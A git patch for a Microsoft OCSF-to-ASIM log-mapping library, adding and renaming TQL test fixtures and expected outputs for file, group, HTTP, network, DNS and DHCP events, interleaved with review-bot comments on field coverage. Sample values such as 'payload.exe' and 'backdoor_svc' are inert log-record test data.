+ DvcHostname: "host1",
+ DvcFQDN: "host1",
+ EventSchema: "FileEvent",
+ EventSchemaVersion: "0.2.2",
+ EventType: "FileRenamed",
+ ActorUsername: "alice",
+ ActorUserId: null,
+ TargetFilePath: "C:\\tmp\\invoice.pdf.exe",
+ TargetFileName: "invoice.pdf.exe",
+ SrcFilePath: "C:\\tmp\\payload.exe",
+ SrcFileName: "payload.exe",
+ SrcFilePathType: "Windows Local",
+ TargetFilePathType: "Windows Local",
+ AdditionalFields: {
+ activity_id: 5,
+ activity_name: "Rename",
+ category_uid: 1,
+ class_uid: 1001,
+ class_name: "File System Activity",
+ type_uid: 100105,
+ time: 2026-01-01T00:00:05Z,
+ severity_id: 1,
+ status: "Success",
+ metadata: {
+ original_event_uid: "file-2",
+ product: {
+ name: "Endpoint",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "host1",
+ },
+ actor: {
+ user: {
+ name: "alice",
+ },
+ },
+ file: {
+ path: "C:\\tmp\\payload.exe",
+ name: "payload.exe",
+ },
+ file_result: {
+ path: "C:\\tmp\\invoice.pdf.exe",
+ name: "invoice.pdf.exe",
+ },
+ },
+ name: "asim.file_event",
+}
diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql
new file mode 100644
index 0000000..e80f66c
--- /dev/null
+++ b/microsoft/tests/asim/ocsf/group_management.tql
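Review bot: Both FileEvent records set `ActorUsername: "alice"` without an `ActorUsernameType`, while the UserManagement expectation removed from the renamed group_management.txt in this same patch carried `ActorUsernameType: "Windows"` beside `ActorUsername: "CORP\\jdoe"`. ASIM expects the type field to accompany the username, and detections that normalize on ActorUsernameType will treat these rows differently from the IAM rows produced by the same mapper. If the mapper only derives the type when a domain is present, make that visible here with an explicit `ActorUsernameType: null`; otherwise a domain-less name like `alice` should come out as `ActorUsernameType: "Simple"`.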
@@ -0,0 +1,82 @@
+from {
+ activity_id: 1,
+ activity_name: "Create",
+ category_uid: 3,
+ category_name: "Identity & Access Management",
+ class_uid: 3001,
+ class_name: "Account Change",
+ type_uid: 300101,
+ type_name: "Account Change: Create",
+ time: 2024-03-23T12:34:56.789012300Z,
+ severity_id: 1,
+ metadata: {
+ event_code: "4720",
+ original_event_uid: "98767",
+ product: {
+ name: "Microsoft-Windows-Security-Auditing",
+ vendor_name: "Microsoft",
+ },
+ profiles: ["host"],
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "DC01.corp.local",
+ },
+ actor: {
+ user: {
+ domain: "CORP",
+ name: "jdoe",
+ uid: "S-1-5-21-3107921522-2185401913-891411500-1104",
+ },
+ },
+ user: {
+ domain: "CORP",
+ name: "backdoor_svc",
+ uid: "S-1-5-21-3107921522-2185401913-891411500-1500",
+ },
+}, {
+ activity_id: 3,
+ activity_name: "Add User",
+ category_uid: 3,
+ category_name: "Identity & Access Management",
+ class_uid: 3006,
+ class_name: "Group Management",
+ type_uid: 300603,
+ type_name: "Group Management: Add User",
+ time: 2024-03-23T12:34:57Z,
+ severity_id: 1,
+ metadata: {
+ event_code: "4728",
+ original_event_uid: "98776",
+ product: {
+ name: "Microsoft-Windows-Security-Auditing",
+ vendor_name: "Microsoft",
+ },
+ profiles: ["host"],
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "DC01.corp.local",
+ },
+ actor: {
+ user: {
+ domain: "CORP",
+ name: "jdoe",
+ uid: "S-1-5-21-3107921522-2185401913-891411500-1104",
+ },
+ },
+ group: {
+ domain: "CORP",
+ name: "DomainAdmins",
+ uid: "S-1-5-21-3107921522-2185401913-891411500-512",
+ },
+ user: {
+ name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local",
+ uid: "S-1-5-21-3107921522-2185401913-891411500-1500",
+ },
+}
+@name = "ocsf.group_management"
+where class_uid == 3006
+microsoft::asim::ocsf::map
+name = @name
+sort EventOriginalType
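Review bot: The fixture still carries the Account Change event (`class_uid: 3001`) even though `where class_uid == 3006` drops it before the mapper runs, so half the file is dead data and `sort EventOriginalType` orders a single record. The UserManagement expectation for that event is removed from the renamed group_management.txt in the next hunk; unless another test in this series asserts it, the `UserCreated` mapping is no longer covered, so either trim the fixture to the group event or keep both classes and drop the filter. This file also sets `@name = "ocsf.group_management"` explicitly while the other new class tests rely on the default `@name`; one convention across the directory would be easier to maintain.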
diff --git a/microsoft/tests/ocsf-to-asim/user-management.txt b/microsoft/tests/asim/ocsf/group_management.txt
similarity index 52%
rename from microsoft/tests/ocsf-to-asim/user-management.txt
rename to microsoft/tests/asim/ocsf/group_management.txt
index 01f6ae5..7f01855 100644
--- a/microsoft/tests/ocsf-to-asim/user-management.txt
+++ b/microsoft/tests/asim/ocsf/group_management.txt
@@ -1,74 +1,3 @@
-{
- EventCount: 1,
- EventStartTime: 2024-03-23T12:34:56.789012300Z,
- EventEndTime: 2024-03-23T12:34:56.789012300Z,
- EventProduct: "Microsoft-Windows-Security-Auditing",
- EventVendor: "Microsoft",
- EventOriginalUid: "98767",
- EventUid: "98767",
- EventOriginalType: "4720",
- EventSeverity: "Informational",
- EventResult: "NA",
- Dvc: "DC01.corp.local",
- DvcHostname: "DC01.corp.local",
- DvcFQDN: "DC01.corp.local",
- EventSchema: "UserManagement",
- EventSchemaVersion: "0.1.2",
- ActorUsername: "CORP\\jdoe",
- ActorUsernameType: "Windows",
- ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104",
- ActorUserIdType: "SID",
- EventType: "UserCreated",
- TargetUsername: "CORP\\backdoor_svc",
- TargetUsernameType: "Windows",
- TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500",
- TargetUserIdType: "SID",
- GroupName: null,
- GroupId: null,
- GroupIdType: null,
- SrcIpAddr: null,
- SrcHostname: null,
- AdditionalFields: {
- activity_id: 1,
- activity_name: "Create",
- category_uid: 3,
- category_name: "Identity & Access Management",
- class_uid: 3001,
- class_name: "Account Change",
- type_uid: 300101,
- type_name: "Account Change: Create",
- time: 2024-03-23T12:34:56.789012300Z,
- severity_id: 1,
- metadata: {
- event_code: "4720",
- original_event_uid: "98767",
- product: {
- name: "Microsoft-Windows-Security-Auditing",
- vendor_name: "Microsoft",
- },
- profiles: [
- "host",
- ],
- version: "1.8.0",
- },
- device: {
- hostname: "DC01.corp.local",
- },
- actor: {
- user: {
- domain: "CORP",
- name: "jdoe",
- uid: "S-1-5-21-3107921522-2185401913-891411500-1104",
- },
- },
- user: {
- domain: "CORP",
- name: "backdoor_svc",
- uid: "S-1-5-21-3107921522-2185401913-891411500-1500",
- },
- },
- name: "asim.user_management",
-}
 {
 EventCount: 1,
 EventStartTime: 2024-03-23T12:34:57Z,
diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql
new file mode 100644
index 0000000..03d4dce
--- /dev/null
+++ b/microsoft/tests/asim/ocsf/http_activity.tql
@@ -0,0 +1,188 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + 
version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, +} +where class_uid == 4002 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/http_activity.txt b/microsoft/tests/asim/ocsf/http_activity.txt new file mode 100644 index 0000000..cd66053 --- /dev/null +++ b/microsoft/tests/asim/ocsf/http_activity.txt 
@@ -0,0 +1,53 @@
+{
+ EventCount: 1,
+ EventStartTime: 2026-01-01T00:00:04Z,
+ EventEndTime: 2026-01-01T00:00:04Z,
+ EventProduct: "Proxy",
+ EventVendor: "Microsoft",
+ EventOriginalUid: "web-1",
+ EventUid: "web-1",
+ EventOriginalType: "400203",
+ EventSeverity: "Informational",
+ EventResult: "Success",
+ Dvc: "proxy1",
+ DvcHostname: "proxy1",
+ DvcFQDN: "proxy1",
+ EventSchema: "WebSession",
+ EventSchemaVersion: "0.2.7",
+ EventType: "HTTPsession",
+ Url: "https://example.org/index.html",
+ HttpRequestMethod: "GET",
+ EventResultDetails: "200",
+ AdditionalFields: {
+ activity_id: 3,
+ activity_name: "Get",
+ category_uid: 4,
+ class_uid: 4002,
+ class_name: "HTTP Activity",
+ type_uid: 400203,
+ time: 2026-01-01T00:00:04Z,
+ severity_id: 1,
+ status: "Success",
+ metadata: {
+ original_event_uid: "web-1",
+ product: {
+ name: "Proxy",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "proxy1",
+ },
+ http_request: {
+ http_method: "GET",
+ url: {
+ url_string: "https://example.org/index.html",
+ },
+ },
+ http_response: {
+ code: 200,
+ },
+ },
+ name: "asim.web_session",
+}
diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.tql b/microsoft/tests/asim/ocsf/map.tql
similarity index 100%
rename from microsoft/tests/ocsf-to-asim/unsupported-strict.tql
rename to microsoft/tests/asim/ocsf/map.tql
diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.txt b/microsoft/tests/asim/ocsf/map.txt
similarity index 100%
rename from microsoft/tests/ocsf-to-asim/unsupported-strict.txt
rename to microsoft/tests/asim/ocsf/map.txt
diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql
new file mode 100644
index 0000000..fcd58a4
--- /dev/null
+++ b/microsoft/tests/asim/ocsf/network_activity.tql
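Review bot: The expectation cannot tell whether `EventResult: "Success"` is derived from the OCSF `status` field or from `http_response.code`, because the only HTTP event in the fixture carries both `status: "Success"` and `code: 200`. ASIM WebSession ties EventResult to the response code (4xx and 5xx are failures), and a proxy record that OCSF reports with a Success status but a 403 response is exactly the case a detection on failed web requests depends on. Adding a second HTTP event to the shared fixture with `status: "Success"` and `code: 403` (constructed values) and asserting its EventResult would pin the intended behaviour.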
@@ -0,0 +1,188 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + 
version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, +} +where class_uid == 4001 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/network_activity.txt b/microsoft/tests/asim/ocsf/network_activity.txt new file mode 100644 index 0000000..005e7cb --- /dev/null +++ b/microsoft/tests/asim/ocsf/network_activity.txt 
@@ -0,0 +1,61 @@
+{
+ EventCount: 1,
+ EventStartTime: 2026-01-01T00:00:01Z,
+ EventEndTime: 2026-01-01T00:00:01Z,
+ EventProduct: "Firewall",
+ EventVendor: "Microsoft",
+ EventOriginalUid: "net-1",
+ EventUid: "net-1",
+ EventOriginalType: "400106",
+ EventSeverity: "Informational",
+ EventResult: "Success",
+ Dvc: "fw1",
+ DvcHostname: "fw1",
+ DvcFQDN: "fw1",
+ EventSchema: "NetworkSession",
+ EventSchemaVersion: "0.2.7",
+ EventType: "Flow",
+ SrcIpAddr: 10.0.0.1,
+ SrcHostname: null,
+ SrcPortNumber: 12345,
+ DstIpAddr: 10.0.0.2,
+ DstHostname: null,
+ DstPortNumber: 443,
+ SrcBytes: 100,
+ DstBytes: 200,
+ AdditionalFields: {
+ activity_id: 6,
+ activity_name: "Traffic",
+ category_uid: 4,
+ class_uid: 4001,
+ class_name: "Network Activity",
+ type_uid: 400106,
+ time: 2026-01-01T00:00:01Z,
+ severity_id: 1,
+ status: "Success",
+ metadata: {
+ original_event_uid: "net-1",
+ product: {
+ name: "Firewall",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "fw1",
+ },
+ src_endpoint: {
+ ip: 10.0.0.1,
+ port: 12345,
+ },
+ dst_endpoint: {
+ ip: 10.0.0.2,
+ port: 443,
+ },
+ traffic: {
+ bytes_out: 100,
+ bytes_in: 200,
+ },
+ },
+ name: "asim.network_session",
+}
diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/asim/ocsf/process_activity.tql
similarity index 100%
rename from microsoft/tests/ocsf-to-asim/process.tql
rename to microsoft/tests/asim/ocsf/process_activity.tql
diff --git a/microsoft/tests/ocsf-to-asim/process.txt b/microsoft/tests/asim/ocsf/process_activity.txt
similarity index 100%
rename from microsoft/tests/ocsf-to-asim/process.txt
rename to microsoft/tests/asim/ocsf/process_activity.txt
diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.txt b/microsoft/tests/ocsf-to-asim/direct-targets.txt
deleted file mode 100644
index 0b7405c..0000000
--- a/microsoft/tests/ocsf-to-asim/direct-targets.txt
+++ /dev/null
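Review bot: The single network event has no `connection_info`, so this expectation never exercises `NetworkProtocol`, `NetworkDirection` or `NetworkProtocolVersion`, the NetworkSession fields most network detections filter on; the output carries only addresses, ports and byte counts. Adding `connection_info: { protocol_name: "tcp", direction: "Outbound" }` (constructed values) to the fixture event and asserting the mapped fields would pin how the mapper handles them. The `SrcBytes`/`DstBytes` assignment from `bytes_out`/`bytes_in` matches the OCSF direction definitions, so nothing to change there.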
@@ -1,339 +0,0 @@ -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:03Z, - EventEndTime: 2026-01-01T00:00:03Z, - EventProduct: "DHCP", - EventVendor: "Microsoft", - EventOriginalUid: "dhcp-1", - EventUid: "dhcp-1", - EventOriginalType: "400405", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "dhcp1", - DvcHostname: "dhcp1", - DvcFQDN: "dhcp1", - EventSchema: "DhcpEvent", - EventSchemaVersion: "0.1.1", - EventType: "Assign", - SrcHostname: "client1", - SrcIpAddr: 10.0.0.50, - SrcMacAddr: "00:11:22:33:44:55", - AdditionalFields: { - activity_id: 5, - activity_name: "Ack", - category_uid: 4, - class_uid: 4004, - class_name: "DHCP Activity", - type_uid: 400405, - time: 2026-01-01T00:00:03Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "dhcp-1", - product: { - name: "DHCP", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dhcp1", - }, - src_endpoint: { - hostname: "client1", - ip: 10.0.0.50, - mac: "00:11:22:33:44:55", - }, - }, - name: "asim.dhcp_event", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:02Z, - EventEndTime: 2026-01-01T00:00:02Z, - EventProduct: "DNS", - EventVendor: "Microsoft", - EventOriginalUid: "dns-1", - EventUid: "dns-1", - EventOriginalType: "400301", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "dns1", - DvcHostname: "dns1", - DvcFQDN: "dns1", - EventSchema: "Dns", - EventSchemaVersion: "0.1.7", - EventType: "Query", - EventSubType: "request", - DnsQuery: "example.org", - DnsQueryTypeName: "A", - DnsQueryClassName: "IN", - EventResultDetails: "NA", - SrcIpAddr: 10.0.0.1, - SrcHostname: null, - DstIpAddr: null, - DstHostname: null, - AdditionalFields: { - activity_id: 1, - activity_name: "Query", - category_uid: 4, - class_uid: 4003, - class_name: "DNS Activity", - type_uid: 400301, - time: 2026-01-01T00:00:02Z, - severity_id: 1, - status: "Success", - rcode: "NA", - metadata: { - original_event_uid: "dns-1", - product: { - 
name: "DNS", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "dns1", - }, - query: { - hostname: "example.org", - type: "A", - class: "IN", - }, - src_endpoint: { - ip: 10.0.0.1, - }, - }, - name: "asim.dns", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:00Z, - EventEndTime: 2026-01-01T00:00:00Z, - EventProduct: "Endpoint", - EventVendor: "Microsoft", - EventOriginalUid: "file-1", - EventUid: "file-1", - EventOriginalType: "100101", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "host1", - DvcHostname: "host1", - DvcFQDN: "host1", - EventSchema: "FileEvent", - EventSchemaVersion: "0.2.2", - EventType: "FileCreated", - ActorUsername: "alice", - ActorUserId: null, - TargetFilePath: "C:\\tmp\\payload.exe", - TargetFileName: "payload.exe", - TargetFilePathType: "Windows Local", - AdditionalFields: { - activity_id: 1, - activity_name: "Create", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100101, - time: 2026-01-01T00:00:00Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-1", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - }, - name: "asim.file_event", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:05Z, - EventEndTime: 2026-01-01T00:00:05Z, - EventProduct: "Endpoint", - EventVendor: "Microsoft", - EventOriginalUid: "file-2", - EventUid: "file-2", - EventOriginalType: "100105", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "host1", - DvcHostname: "host1", - DvcFQDN: "host1", - EventSchema: "FileEvent", - EventSchemaVersion: "0.2.2", - EventType: "FileRenamed", - ActorUsername: "alice", - ActorUserId: null, - TargetFilePath: "C:\\tmp\\invoice.pdf.exe", - TargetFileName: "invoice.pdf.exe", - SrcFilePath: 
"C:\\tmp\\payload.exe", - SrcFileName: "payload.exe", - SrcFilePathType: "Windows Local", - TargetFilePathType: "Windows Local", - AdditionalFields: { - activity_id: 5, - activity_name: "Rename", - category_uid: 1, - class_uid: 1001, - class_name: "File System Activity", - type_uid: 100105, - time: 2026-01-01T00:00:05Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "file-2", - product: { - name: "Endpoint", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "host1", - }, - actor: { - user: { - name: "alice", - }, - }, - file: { - path: "C:\\tmp\\payload.exe", - name: "payload.exe", - }, - file_result: { - path: "C:\\tmp\\invoice.pdf.exe", - name: "invoice.pdf.exe", - }, - }, - name: "asim.file_event", -} -{ - EventCount: 1, - EventStartTime: 2026-01-01T00:00:01Z, - EventEndTime: 2026-01-01T00:00:01Z, - EventProduct: "Firewall", - EventVendor: "Microsoft", - EventOriginalUid: "net-1", - EventUid: "net-1", - EventOriginalType: "400106", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "fw1", - DvcHostname: "fw1", - DvcFQDN: "fw1", - EventSchema: "NetworkSession", - EventSchemaVersion: "0.2.7", - EventType: "Flow", - SrcIpAddr: 10.0.0.1, - SrcHostname: null, - SrcPortNumber: 12345, - DstIpAddr: 10.0.0.2, - DstHostname: null, - DstPortNumber: 443, - SrcBytes: 100, - DstBytes: 200, - AdditionalFields: { - activity_id: 6, - activity_name: "Traffic", - category_uid: 4, - class_uid: 4001, - class_name: "Network Activity", - type_uid: 400106, - time: 2026-01-01T00:00:01Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "net-1", - product: { - name: "Firewall", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "fw1", - }, - src_endpoint: { - ip: 10.0.0.1, - port: 12345, - }, - dst_endpoint: { - ip: 10.0.0.2, - port: 443, - }, - traffic: { - bytes_out: 100, - bytes_in: 200, - }, - }, - name: "asim.network_session", -} -{ - EventCount: 1, - 
EventStartTime: 2026-01-01T00:00:04Z, - EventEndTime: 2026-01-01T00:00:04Z, - EventProduct: "Proxy", - EventVendor: "Microsoft", - EventOriginalUid: "web-1", - EventUid: "web-1", - EventOriginalType: "400203", - EventSeverity: "Informational", - EventResult: "Success", - Dvc: "proxy1", - DvcHostname: "proxy1", - DvcFQDN: "proxy1", - EventSchema: "WebSession", - EventSchemaVersion: "0.2.7", - EventType: "HTTPsession", - Url: "https://example.org/index.html", - HttpRequestMethod: "GET", - EventResultDetails: "200", - AdditionalFields: { - activity_id: 3, - activity_name: "Get", - category_uid: 4, - class_uid: 4002, - class_name: "HTTP Activity", - type_uid: 400203, - time: 2026-01-01T00:00:04Z, - severity_id: 1, - status: "Success", - metadata: { - original_event_uid: "web-1", - product: { - name: "Proxy", - vendor_name: "Microsoft", - }, - version: "1.8.0", - }, - device: { - hostname: "proxy1", - }, - http_request: { - http_method: "GET", - url: { - url_string: "https://example.org/index.html", - }, - }, - http_response: { - code: 200, - }, - }, - name: "asim.web_session", -} From 7233be9270627079fd7765e04951dc9843c54ff4 Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:51:18 +0200 Subject: [PATCH 17/27] Target Microsoft mappers by field Require Microsoft map UDOs to write through an explicit event field. This makes OCSF and ASIM mapping composable with surrounding records and lets callers attach raw data outside the mapper without relying on deferred argument evaluation. Assisted-by: GPT-5 Codex (Superconductor) --- .../graph-defender-alerts-to-ocsf.tql | 4 +- .../graph-defender-incidents-to-ocsf.tql | 4 +- .../graph-directory-audits-to-ocsf.tql | 4 +- .../graph-intune-compliance-to-ocsf.tql | 4 +- .../graph-intune-detected-apps-to-ocsf.tql | 4 +- .../graph-intune-managed-devices-to-ocsf.tql | 4 +- .../graph-risk-detections-to-ocsf.tql | 4 +- .../examples/graph-risky-users-to-ocsf.tql | 4 +- microsoft/examples/graph-sign-ins-to-ocsf.tql | 4 +- .../examples/windows-event-log-to-ocsf.tql | 7 ++- microsoft/operators/asim/map.tql | 17 +++++-- .../operators/asim/ocsf/account_change.tql | 12 ++++- .../operators/asim/ocsf/authentication.tql | 12 ++++- .../operators/asim/ocsf/authorize_session.tql | 12 ++++- .../asim/ocsf/compliance_finding.tql | 12 ++++- .../operators/asim/ocsf/detection_finding.tql | 12 ++++- .../operators/asim/ocsf/dhcp_activity.tql | 12 ++++- .../operators/asim/ocsf/dns_activity.tql | 12 ++++- .../operators/asim/ocsf/entity_management.tql | 12 ++++- .../asim/ocsf/event_log_activity.tql | 12 ++++- .../asim/ocsf/file_system_activity.tql | 12 ++++- .../operators/asim/ocsf/group_management.tql | 12 ++++- .../operators/asim/ocsf/helpers/common.tql | 2 +- .../operators/asim/ocsf/http_activity.tql | 12 ++++- microsoft/operators/asim/ocsf/map.tql | 47 ++++++++++--------- .../operators/asim/ocsf/network_activity.tql | 12 ++++- .../operators/asim/ocsf/process_activity.tql | 12 ++++- .../asim/ocsf/scheduled_job_activity.tql | 12 ++++- .../asim/ocsf/windows_service_activity.tql | 12 ++++- microsoft/operators/graph/ocsf/map.tql | 11 ++++- microsoft/operators/ocsf/map.tql | 11 
+++-- microsoft/operators/windows/ocsf/map.tql | 11 ++++- microsoft/tests/asim/graph.tql | 4 +- microsoft/tests/asim/ocsf.tql | 4 +- microsoft/tests/asim/ocsf/account_change.tql | 4 +- microsoft/tests/asim/ocsf/authentication.tql | 4 +- .../tests/asim/ocsf/detection_finding.tql | 4 +- microsoft/tests/asim/ocsf/dhcp_activity.tql | 4 +- microsoft/tests/asim/ocsf/dns_activity.tql | 4 +- .../tests/asim/ocsf/event_log_activity.tql | 4 +- .../tests/asim/ocsf/file_system_activity.tql | 4 +- .../tests/asim/ocsf/group_management.tql | 4 +- microsoft/tests/asim/ocsf/http_activity.tql | 4 +- microsoft/tests/asim/ocsf/map.tql | 3 +- .../tests/asim/ocsf/network_activity.tql | 4 +- .../tests/asim/ocsf/process_activity.tql | 4 +- microsoft/tests/asim/windows.tql | 4 +- ...pliance-policy-setting-state-summaries.tql | 4 +- .../tests/graph/ocsf/defender-alerts.tql | 4 +- .../tests/graph/ocsf/defender-incidents.tql | 4 +- microsoft/tests/graph/ocsf/detected-apps.tql | 4 +- .../tests/graph/ocsf/directory-audits.tql | 4 +- .../tests/graph/ocsf/managed-devices.tql | 4 +- .../tests/graph/ocsf/risk-detections.tql | 4 +- microsoft/tests/graph/ocsf/risky-users.tql | 4 +- microsoft/tests/graph/ocsf/sign-ins.tql | 4 +- microsoft/tests/ocsf/eid-0100.tql | 7 ++- microsoft/tests/ocsf/eid-0100.txt | 2 + microsoft/tests/ocsf/eid-0101.tql | 7 ++- microsoft/tests/ocsf/eid-0101.txt | 2 + microsoft/tests/ocsf/eid-0102.tql | 7 ++- microsoft/tests/ocsf/eid-0102.txt | 2 + microsoft/tests/ocsf/eid-0106.tql | 7 ++- microsoft/tests/ocsf/eid-0106.txt | 2 + microsoft/tests/ocsf/eid-0129.tql | 7 ++- 